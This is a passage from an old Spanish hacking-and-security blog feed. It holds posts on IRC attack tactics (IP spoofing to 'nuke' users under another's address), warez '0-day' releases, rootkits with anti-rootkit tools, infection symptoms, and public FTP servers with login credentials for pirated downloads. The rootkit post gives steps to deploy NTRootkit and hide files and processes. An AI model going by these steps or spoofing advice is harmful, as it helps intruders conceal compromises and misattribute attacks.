También puede ser la base de algún ataque, como ocurre con el IP Spoofing que los hackers suelen emplear (me desviaría del tema  de este escrito si siguiese escribiendo...).&lt;br /&gt;&lt;br /&gt;Se trata de "spoofear" (=falsear) la dirección IP de origen de los paquetes que se mandan a la víctima, de forma que ésta crea que el origen de dichos paquetes es otro (el que nosotros le indiquemos). De esta forma protegemos nuestro anonimato, y en general podemos llevar a cabo cualquier acción que se nos pueda ocurrir y que se derive de una falsa dirección source (origen). Por ejemplo, podemos nukear a alguien, con la dirección fuente de otro, haciendo creer a la víctima (si ésta tiene un analizador de paquetes o algo parecido) que es el otro el que le está atacando }:-).&lt;br /&gt;&lt;br /&gt;El spoofing es (o podría ser) una funcionalidad más del programa de ataque (del nuker, del ping, ...). Como consiste en manejar IP desde un muy bajo nivel en muchos casos se requieren privilegios especiales. Por ejemplo, en el caso de máquinas Unix, se necesita abrir "raw sockets" y ésto requiere de privilegios de superusuario (root).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 102, 0);"&gt;4.- Resources.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt; Este apartado está dedicado, brevemente, a los distintos programas disponibles y útiles a nuestra causa :-).&lt;br /&gt;&lt;br /&gt;Por ahora sólo incluyo la siguiente URL:  http://www.7thsphere.com/virus. Allí podrás encontrar toda clase de utilidades para Windows y Linux: programas nukeadores, port-scanners, étc...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;También me gustaría recordar que el IRC no es un campo de batalla, y que no se debe atacar a la gente así porque así, salvo "en defensa propia" y pocos casos más justificados. O:-)  En cualquier caso un ataque nunca está justificado desde el punto de vista de los ircops, así que cuidado con las K/G-lines ;-)&lt;br /&gt;&lt;br /&gt;Por último, decir que este artículo es la primera versión y que pudiera contener numerosos errores así como algún que otro "punto negro". Se agradecería toda clase de comentarios y sugerencias para mejorar el documento: bug reports, asuntos que creáis no están bien explicados, temas que faltan y se deberían incluir, ..., y en definitiva todo lo que os gustaría que se incluyese en el documento. También se aceptan O-lines ;-)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/direcc.&gt;&lt;/span&gt;fuente:&lt;span style="color: rgb(0, 0, 0);"&gt; roman@deathsdoor.com&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-3904364352187694726?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/3904364352187694726/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/tacticas-de-guerra-en-el-irc.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3904364352187694726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3904364352187694726'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/tacticas-de-guerra-en-el-irc.html' title='Tácticas de guerra en el IRC'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-1850397677762131000</id><published>2009-11-27T15:32:00.000+01:00</published><updated>2009-11-27T15:35:33.792+01:00</updated><title type='text'>QUE ES UN 0-DAY ?</title><content type='html'>&lt;span property="dc:content"&gt;0Day es la denominación que se le tienen las releases (releases son los lanzamientos, osea cuando ponen un programa crackeado o en su defecto solo el crack para un programa disponible para descargar.&lt;br /&gt;&lt;br /&gt;Estas releases 0day o 0-day (cero día) significa que son programas que son crackeados el mismo día en que son sacados por los autores, o son cracks o programas que recién han salido a la luz. 0day o 0-day significa lo último disponible, lo más nuevo, calentito calentito, recién sacado del horno... se entiende no ?.&lt;br /&gt;&lt;br /&gt;Los grupos de crackers distribuyen sus releases 0-Day, que luego de pasar por los servidores privados de cada grupo son distribuidos en USENET en los newsgroups 0day.games , 0day.warez, 0day.appz, 0day.ibm.pc, etc y que luego son subidos en servidores archivos para descarga como Rapidshare, Megaupload, etc y que luego se distribuyen por P2P.&lt;br /&gt;&lt;br /&gt;Pueden verificar las releases 0-day buscando los titulos listados en: http://www.binsearch.info&lt;br /&gt;&lt;br /&gt;Características de Usenet&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_mFMUaCwtbag/Sw_jhi1N9tI/AAAAAAAAADY/Td_CtjTNitk/s1600/245px-Usenet_servers_and_clients.svg.png"&gt;&lt;img style="cursor: pointer; width: 181px; height: 166px;" src="http://1.bp.blogspot.com/_mFMUaCwtbag/Sw_jhi1N9tI/AAAAAAAAADY/Td_CtjTNitk/s320/245px-Usenet_servers_and_clients.svg.png" alt="" id="BLOGGER_PHOTO_ID_5408791842920462034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Conexiones entre usuarios y servidores en un sistema Usenet.&lt;br /&gt;&lt;br /&gt;&lt;span property="dc:content"&gt;&lt;br /&gt;Usenet es uno de los sistemas de comunicaciones más antiguos. Permite a cualquier persona, intercambiar mensajes en foros públicos, generalmente relacionados a un tema específico (determinado por el grupo donde se publican-leen los mensajes).&lt;br /&gt;&lt;br /&gt;Cuando un usuario se suscribe a un grupo de noticias, la aplicación cliente de noticias se encarga de descargar todos los mensajes disponibles en un servidor y los ordena. Cada servidor determina el tiempo que durará un mensaje almacenado.&lt;br /&gt;&lt;br /&gt;Actualmente los grupos de noticias de usenet no sólo se usan para intercambiar texto, sino que son una fuente inagotable de todo tipo de contenidos: software, videos, imágenes, documentos, música, etc.&lt;br /&gt;&lt;br /&gt;Si quieren indagar más sobre USENET:&lt;br /&gt;&lt;br /&gt;http://es.wikipedia.org/wiki/Usenet&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-1850397677762131000?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/1850397677762131000/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/que-es-un-0-day.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/1850397677762131000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/1850397677762131000'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/que-es-un-0-day.html' title='QUE ES UN 0-DAY ?'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_mFMUaCwtbag/Sw_jhi1N9tI/AAAAAAAAADY/Td_CtjTNitk/s72-c/245px-Usenet_servers_and_clients.svg.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6496458162096122807</id><published>2009-11-26T09:39:00.000+01:00</published><updated>2009-11-26T10:08:44.156+01:00</updated><title type='text'>Rootkit sin defensa posible?</title><content type='html'>Un rootkit es una herramienta, o un grupo de ellas que tiene como finalidad esconderse a sí misma y esconder otros programas, procesos, archivos, directorios, claves de registro, y puertos que permiten al intruso mantener el acceso a un sistema para remotamente comandar acciones o extraer información sensible. Existen rootkits para una amplia variedad de sistemas operativos, como GNU/Linux, Solaris o Microsoft Windows.&lt;br /&gt;&lt;br /&gt;fuente : wikipedia&lt;br /&gt;&lt;br /&gt;Para el sistema operativo de windows esta el NTROOT,NTRootkit no es exactamente un virus. Se trata de una herramienta que algunos hackers utilizan para que el usuario del ordenador afectado no se percate de sus actuaciones.&lt;br /&gt;&lt;br /&gt;Es el propio hacker quien, una vez que han conseguido acceder a otra máquina, instala en el sistema a NTRootkit.&lt;br /&gt;&lt;br /&gt;NTRootkit sólo puede funcionar en ordenadores que tengan instalado el sistema operativo Windows NT, 2000 o XP. En ellos puede provocar efectos distintos, puesto que existen distintas variantes de NTRootkit que son capaces de llevar a cabo actuaciones diferentes.Para poder usarlo casi siempre se tendra que compilar es raro encontrar el .exe.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;OS PONGO UNA PEQUEÑA EXPLICACION &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;La forma de usarlo seria , una vez descargado ,debes buscar el directorio donde se ha descargado (normalmente en c,) abre la consola y escribe su directorio hay debes buscar deploy.exe ejecutalo y ya esta.&lt;br /&gt;&lt;br /&gt;Para probarlo su funcionamiento ,crea un directorio el que quieras (ejem.  musica) mete un archivo de texto.txt renombralo a  _root_ musica( todo achivo renombado a _roo desaparece) haz un dir y veras que ese achivo a desparecido.&lt;br /&gt;&lt;br /&gt;Para oculta los procesos,o en lineas de registro  es lo mismo debes renombrar _root_ lo que sea.exe&lt;br /&gt;se ocultara hasta en el mataprocesos(Control+ alt+ supr).&lt;br /&gt;&lt;br /&gt;Para activarlo pones en consola net start _root_&lt;br /&gt;Para desactivarlo pones en consola net stop _root_&lt;br /&gt;&lt;br /&gt;PD:se cree que los windows de nuestro querido bill puertas bienen instalados los rootkits&lt;br /&gt;verdad o mentira?&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;strong&gt;&lt;span style="font-family:Arial;font-size:85%;color:#0000a0;"&gt;&lt;span style="color: rgb(255, 0, 0);font-size:100%;" &gt;ANTI-ROOTKIT LICENCIA GRATUITA           (FREEWARE)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family:Arial;font-size:85%;"&gt;&lt;b&gt;&lt;span style="color:#0000a0;"&gt;&lt;u&gt;F-Secure BlackLight Rootkit Eliminator                 2.2.1092:&lt;/u&gt;&lt;/span&gt;&lt;/b&gt; Detecta y elimina ‘objetos’ ocultos, tanto a la vista           del usuario como a las utilidades de seguridad habituales. Esta utilidad es muy sencilla, basta con           ejecutarla sin necesidad de instalación e indicarle que inicie el                 escaneo. Sus virtudes son que sólo se muestra           cuando realmente ha encontrado un rootkit, su velocidad de análisis y           la posibilidad de eliminar rootkits activos.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:Arial;font-size:85%;"&gt;&lt;b&gt;&lt;span style="color:#0000a0;"&gt;&lt;u&gt;Lavasoft           ARIES Rootkit Remover 1.0:&lt;/u&gt;&lt;/span&gt;&lt;/b&gt; Detecta y elimina                 de su computador el famoso rootkit puesto por &lt;span style="color:#ff0000;"&gt;&lt;b&gt; Sony&lt;/b&gt;&lt;/span&gt; en sus CDS                 para para evitar copias ilegales, además, este programa           evita que se vuelva a infectar si inserta de nuevo dicho CD.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:Arial;font-size:85%;"&gt;&lt;b&gt;&lt;span style="color:#0000a0;"&gt;&lt;u&gt;Norman Malware Cleaner               2009.04.22:&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;   &lt;span id="intelliTXT"&gt;Es una           herramienta que ofrece protección para impedir que los "malwares"           entren a su sistema y permite erradicarlos una vez producida la           infección. La lista de elementos reconocidos no es muy  elevada           ya que Norman Malware Cleaner es más una herramienta específica para           eliminar determinados rootkits y malware, eliminando las variantes           reconocidas&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:Arial;font-size:85%;"&gt;&lt;b&gt;&lt;span style="color:#0000a0;"&gt;&lt;u&gt;Sophos           Anti-Rootkit 1.10:&lt;/u&gt;&lt;/span&gt;&lt;/b&gt; Esta sencilla herramienta es capaz de localizar y eliminar cualquier rootkit que se haya escondido en tu sistema, analizando para ello todas tus unidades de disco, procesos activos y Registro de Windows.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);font-size:100%;" &gt;&lt;strong&gt;&lt;span style="font-family:Arial;"&gt;ANTI-ROOTKIT LICENCIA COMERCIAL (EVALUACIÓN)&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:Arial;font-size:85%;"&gt;&lt;b&gt;&lt;span style="color:#0000a0;"&gt;&lt;u&gt;RegRun Security           Suite 4.60:&lt;/u&gt;&lt;/span&gt;&lt;/b&gt; Completa suite de seguridad diseñada para detectar y eliminar virus, troyanos, spyware e incluso los nuevos y resistentes &lt;a href="http://www.seguridadpc.net/rootkits.htm" target="_blank"&gt;rootkits&lt;/a&gt;. Esta suite no sustituye a su antivirus, es un buen complemento que incluye más de una treintena de funciones/utilidades para ‘vigilar’ a fondo tu sistema; optimizar el inicio, capturar rootkits, proteger los archivos esenciales del sistema, monitorizar las conexiones a Internet, entre otros.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:Arial;font-size:85%;"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color:#0000a0;"&gt;UnHackMe           4.5 Beta:&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;  Sencilla y rápida utilidad para detectar rootkits e intentar eliminarlos de           su sistema.           Esta utilidad es muy simple, lo ejecuta y pulse sobre: “Check me now!”. Casi al momento           vera si su           computador está infectado o no.           También incluye un monitorizador que, cada minuto (configurable),           comprobará si se ha colado alguno de estos peligrosos rootkits en           su           sistema.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6496458162096122807?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6496458162096122807/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/rootkit-sin-defensa-posible.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6496458162096122807'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6496458162096122807'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/rootkit-sin-defensa-posible.html' title='Rootkit sin defensa posible?'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-2872158995428747215</id><published>2009-11-25T13:17:00.000+01:00</published><updated>2009-11-25T13:19:23.830+01:00</updated><title type='text'>Síntomas o ¿Cómo saber si estoy infectado???</title><content type='html'>* Le aparecen Ventanas de publicidad continuamente&lt;br /&gt;&lt;br /&gt;    * Lentitud del Ordenador&lt;br /&gt;&lt;br /&gt;    * Facturas de teléfono elevadas&lt;br /&gt;&lt;br /&gt;    * Secuestro del navegador de Internet&lt;br /&gt;&lt;br /&gt;    * Aparición de barra de búsquedas de diferentes sitios en el navegador&lt;br /&gt;&lt;br /&gt;    * Aparición de diferentes íconos en la barra de tareas del navegador&lt;br /&gt;&lt;br /&gt;    * La casilla de correo posee infinidades de mensajes que no son deseados&lt;br /&gt;&lt;br /&gt;    * El sistema operativo se torna muy inestable&lt;br /&gt;&lt;br /&gt;    * La conexión a Internet demuestra lentitud y poca transferencia de datos&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 11pt; line-height: 1.3em;"&gt;&lt;b&gt;Causas o ¿Por qué a mi???&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;    * ¿Recientemente ha descargado música por Internet?&lt;br /&gt;&lt;br /&gt;    * ¿Ha utilizado programas gratuitos?&lt;br /&gt;&lt;br /&gt;    * ¿Ha entrado en páginas Web no fiables?&lt;br /&gt;&lt;br /&gt;    * ¿Ha intercambiado datos con algún usuario desconocido?&lt;br /&gt;&lt;br /&gt;    * ¿Ha utilizado programas p2p para la descarga de archivos?&lt;br /&gt;&lt;br /&gt;    * ¿Ha abierto correos electrónicos de procedencia dudosa y descargado los archivos adjuntos?&lt;br /&gt;&lt;br /&gt;    * ¿Posee algún medio de protección contra esto?&lt;br /&gt;&lt;br /&gt;    * ¿Ha ingresado en sitios donde exigen su numeración telefónica?&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 12pt; line-height: 1.3em;"&gt;&lt;b&gt;Efectos o ¿Qué me puede pasar?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;    * Imposibilidad de navegar por Internet.&lt;br /&gt;&lt;br /&gt;    * El Ordenador se le ralentiza hasta quedar totalmente bloqueado.&lt;br /&gt;&lt;br /&gt;    * Robos bancarios y de contraseñas secretas&lt;br /&gt;&lt;br /&gt;    * Transferencia nula de información vía Internet&lt;br /&gt;&lt;br /&gt;    * La facturación del teléfono puede llegar a ser 4 veces más de lo que paga&lt;br /&gt;&lt;br /&gt;    * Robo de información sobre la tarjeta de crédito&lt;br /&gt;&lt;br /&gt;    * Obtención de documentos privados e individuales o empresariales&lt;br /&gt;&lt;br /&gt;    * Extracción de Fotografías o diseños privados e individuales o empresariales&lt;br /&gt;&lt;br /&gt;    * Extracción de las listas de contactos del correo electrónico&lt;br /&gt;&lt;br /&gt;    * Utilización de su ordenador con fines ilegales, como por ejemplo, el hacking&lt;br /&gt;&lt;br /&gt;    * Filtraciones por medio de la red interna hacia las terminales&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 12pt; line-height: 1.3em;"&gt;&lt;b&gt;Medidas de prevención ¿Qué puedo hacer?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;    * Descargar archivos siempre de servidores Fiables&lt;br /&gt;&lt;br /&gt;    * Asegurarse que detrás de las aplicaciones hay una empresa real y fiable.&lt;br /&gt;&lt;br /&gt;    * Tener un buen Antispyware que le proteja&lt;br /&gt;&lt;br /&gt;    * Pedir el consejo de un experto (ir a análisis de un experto)&lt;br /&gt;&lt;br /&gt;    * No navegar en sitios donde se piden números telefónicos.&lt;br /&gt;&lt;br /&gt;    * No ingresar la dirección de correo en sitios de Internet sospechosos.&lt;br /&gt;&lt;br /&gt;    * Tener cuidado al utilizar programas p2p (peer to peer) porque muy posiblemente le descargarán alguna clase de infección.&lt;br /&gt;&lt;br /&gt;    * No abrir correos electrónicos que contengan documentos adjuntos de procedencia dudosa.&lt;br /&gt;&lt;br /&gt;    * No navegar en sitios de descarga de cracks, serial y demás.&lt;br /&gt;&lt;br /&gt;    * Evitar todo sitio web ilegal de descargas gratuitas y demás.&lt;br /&gt;&lt;br /&gt;    * No confiar en software gratuito hasta no saber su procedencia real.&lt;br /&gt;&lt;br /&gt;    * Aceptar transferencias de datos solamente de usuarios conocidos y confiables.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 13pt; line-height: 1.3em;"&gt;&lt;b&gt;eliminación del Spyware&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Recomendaciones de programas para combatir los Spyware, pondré una lista de los mas confiables a la hora de combatirlos .&lt;br /&gt;&lt;br /&gt;&lt;b&gt;SpyRemover 2.6.5&lt;/b&gt;&lt;br /&gt;&lt;a href="http://culturahack.com.ar/Foro/index.php/topic,1447.0.html" target="_blank"&gt;http://culturahack.com.ar/Foro/index.php?topic=1447.0&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ad-Aware&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.lavasoftusa.com/" target="_blank"&gt;www.lavasoftusa.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Arovax AntiSpyware free&lt;/b&gt;&lt;br /&gt;&lt;a href="http://culturahack.com.ar/Foro/index.php/topic,776.0.html" target="_blank"&gt;http://culturahack.com.ar/Foro/index.php?topic=776.0&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Es recomendable siempre tener un buen antivirus actualizado ,nosotros hemos echo una encuesta en el foro y en base a eso te recomendamos &lt;b&gt;NOD32 &lt;/b&gt; O &lt;b&gt;KasperSky&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Una recomendación imprescindible es tener instalado un buen Firewall,te recomendamos el &lt;b&gt;ZoneAlarm PRO&lt;/b&gt; es muy sencillo de usar, la versión PRO te da la oportunidad de bloquear Cookies, Adwares, Pop-Ups, Embeded Objects, Mime Objects, Scripts y Java Scripts, Active-X, Vbscripts, además de las funciones básicas de filtración de puertos.&lt;br /&gt;Es un software muy completo y muy eficaz que te evitará que muchos de ésos archivos espía se infiltren en tu computadora.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;ZoneAlarm PRO&lt;/b&gt;&lt;br /&gt;&lt;a href="http://culturahack.com.ar/Foro/index.php/topic,1260.0.html" target="_blank"&gt;http://culturahack.com.ar/Foro/index.php?topic=1260.0&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;También, hay ocasiones en que los archivos espía no pueden ser detectados por programas como el Ad-aware, y en éstos casos es recomendable un buen programa antitroyano como:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;The Cleaner&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.moosoft.com/" target="_blank"&gt;www.moosoft.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Si después de usar un programa específico para eliminar los archivos espía, sigues teniendo problemas, es bueno usar un programa como éste para detectar "lo indetectable".&lt;br /&gt;&lt;br /&gt;Y como última recomendación, te doy 2 programas que te permitirán ver los procesos que se ejecutan en tu computadora, y que generalmente se ocultan si tratas de descubrirlos ya sea en modo de consola o de administrador de dispositivos (en sistemas Windows):&lt;br /&gt;&lt;br /&gt;&lt;b&gt;RootKit Revealer&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.sysinternals.com/Utilities/RootkitRevealer.html" target="_blank"&gt;www.sysinternals.com/Utilities/RootkitRevealer.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;ProcessExplorer&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.sysinternals.com/Utilities/ProcessExplorer.html" target="_blank"&gt;www.sysinternals.com/Utilities/ProcessExplorer.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Definición completa de Rootkit&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.culturahack.com/Foro/index.php?topic=1083.0" target="_blank"&gt;http://www.culturahack.com/Foro/index.php?topic=1083.0&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;fuente: culturahack&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-2872158995428747215?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/2872158995428747215/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/sintomas-o-como-saber-si-estoy.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2872158995428747215'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2872158995428747215'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/sintomas-o-como-saber-si-estoy.html' title='Síntomas o ¿Cómo saber si estoy infectado???'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-4066715375017413993</id><published>2009-11-23T13:33:00.000+01:00</published><updated>2009-11-23T13:37:28.275+01:00</updated><title type='text'>Servidores ftp Publicos</title><content type='html'>Os dejo unos servidores ftp, es otra forma de descargarse  musica,juegos, ect..............&lt;br /&gt;&lt;br /&gt;para poder usarlo teneis que descargaros el &lt;a href="http://www.egydown.com/2021-flashfxp.html"&gt;flashfxp&lt;/a&gt;&lt;br /&gt;alguna duda dejar en comentario o en el correo.&lt;br /&gt;&lt;br /&gt;   * http://www.listen77.com/mp3/&lt;br /&gt;&lt;br /&gt;Servidor FTP de Música, no se ni cuanta música hay:&lt;br /&gt;&lt;br /&gt;   * ftp://193.43.36.131/Radio/History/&lt;br /&gt;   * ftp://193.43.36.131/Radio/MP3/&lt;br /&gt;   * ftp://193.43.36.131/Radio/RealAudio/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ftp:lucas:123456@lucaseo.ftpserver.nu&lt;br /&gt;  1. ftp://ftp.freenet.de/pub/filepilot/&lt;br /&gt;  2. ftp://207.71.8.54:21/games/&lt;br /&gt;  3. ftp://129.241.210.42/pub/games/&lt;br /&gt;  4. ftp://212.174.160.21/games&lt;br /&gt;  5. ftp://129.241.210.42/pub/games/&lt;br /&gt;  6. ftp://clubmusic:clubmusic@217.172.16.3:8778/&lt;br /&gt;  7. ftp://194.187.207.98/video/&lt;br /&gt;  8. ftp://194.187.207.98/music/&lt;br /&gt;  9. ftp://194.187.207.98/soft/&lt;br /&gt; 10. ftp://ftp.uglan.ck.ua/&lt;br /&gt; 11. ftp://159.153.197.74/pub&lt;br /&gt; 12. ftp://leech:l33ch@61.145.123.141:5632/&lt;br /&gt; 13. ftp://psy:psy@ftp.cybersky.ru&lt;br /&gt; 14. ftp://130.89.175.1/pub/games/&lt;br /&gt; 15. ftp://194.44.214.3/pub/&lt;br /&gt; 16. ftp://195.161.112.15/musik/&lt;br /&gt; 17. ftp://195.131.10.164/software&lt;br /&gt; 18. ftp://195.146.65.20/pub/win/&lt;br /&gt; 19. ftp://212.122.1.85/pub/software/&lt;br /&gt; 20. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ftp://217.216.192.91     SERVIDOR DE POBAS (PENTIUM 2 A 350).Encontrareis de todo un poco,,,; software, mp3, tutoriales, juegos, flash, videos,,,,&lt;br /&gt;ftp.celestial.com     Linux&lt;br /&gt;ftp.cetis.hvu.nl     I.P. de Utrech, Holanda. IRC, Linux, Imágenes, Sim Tel on-line&lt;br /&gt;ftp.ceu.fi.udc.es     Facultade de Informática - Universidade da Coruña&lt;br /&gt;ftp.cica.es     Centro Informático Cientifico de Andalucía&lt;br /&gt;ftp.cica.indiana.edu     CICA archivo Windows 95 y 3.11&lt;br /&gt;ftp.cistia.es     Universidad de Canarias&lt;br /&gt;ftp.clark.net     Gráficos, iconos, mirrors, Amiga, Linux,&lt;br /&gt;ftp.clark.net     Gráficos, iconos, mirrors, Amiga, Linux,&lt;br /&gt;ftp.clip.dia.fi.uma.es     Departamento de Inteligencia Artificial - Universidad Politécnica de Madrid&lt;br /&gt;ftp.coast.net     SimTel Archives Quizá la mayor colección para DOS, Win y NT&lt;br /&gt;ftp.cs.tu-berlin.de     Alemania&lt;br /&gt;ftp.cs.ruu.nl     Todo lo que quieras en y sobre el formato MIDI&lt;br /&gt;ftp.download.com     Admite hasta 1000 usuarios simultáneos. Una bestia&lt;br /&gt;ftp.demon.co.uk     Antivirus para todas las plataformas Mirror de ftp.xfree86.org&lt;br /&gt;ftp.dit.upm.es&lt;br /&gt;   DIT - Universidad Politécnica de Madrid.&lt;br /&gt;ftp.etse.urv.es     Escola Tecnica Superior d'Enginyeria - Universitat Rovira i Virgili&lt;br /&gt;ftp.etsimo.uniovi.es     Escuela de Minas / Servicio de Informática Gráfica - Universidad de Oviedo&lt;br /&gt;ftp.fc.udg.es     Facultat de Cincies - Universitat de Girona&lt;br /&gt;ftp.funet.fi     Red Universitaria de Finlandia. Tiene de todo&lt;br /&gt;ftp.gaetano.uhu.es     D.I.E.S.I.A. Universidad de Huelva.&lt;br /&gt;ftp.garbo.uwasa.fi     GARBO, en Finlandia.No necesita presentación: DOS, Win, MAC, UNIX&lt;br /&gt;ftp.gui.uva.es     Universidad de Valladolid. Montañas de cosas (S.Pack 2 NT4)&lt;br /&gt;ftp.idg.es     Pc Actual. Tiene cosas buenas&lt;br /&gt;ftp.iaa.es     Instituto de Astrofísica de Andalucía - Consejo Superior de Investigaciones Científicas&lt;br /&gt;ftp.iac.es     I. Astrofísico de Canarias&lt;br /&gt;ftp.ird.ub.es&lt;br /&gt; &lt;br /&gt;Universitat de Barcelona&lt;br /&gt;ftp://makosteszta.sote.hu     En Hungría. Antivirus&lt;br 